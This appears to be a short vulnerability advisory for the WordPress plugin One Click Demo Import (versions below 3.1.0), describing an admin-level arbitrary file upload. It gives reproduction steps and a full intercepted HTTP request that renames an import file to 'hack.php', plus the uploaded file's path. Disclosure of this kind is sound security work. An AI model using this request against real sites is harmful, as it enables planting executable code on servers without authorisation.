The plugin does not validate the imported file, allowing high privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed
Access Tools > Import > One Click Demo Import > Run Importer and import dummy XML file (can be empty) Intercept the request made and change the filename as well as content: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------18228892847416541933274753306 Content-Length: 507 Connection: close Cookie: [admin+] -----------------------------18228892847416541933274753306 Content-Disposition: form-data; name=“action” ocdi_upload_manual_import_files -----------------------------18228892847416541933274753306 Content-Disposition: form-data; name=“security” e35089cb91 -----------------------------18228892847416541933274753306 Content-Disposition: form-data; name=“content_file”; filename=“hack.php” Content-Type: text/xml -----------------------------18228892847416541933274753306-- The file will be at https://example.com/wp-content/uploads///hack.php
CPE | Name | Operator | Version |
---|---|---|---|
one-click-demo-import | lt | 3.1.0 |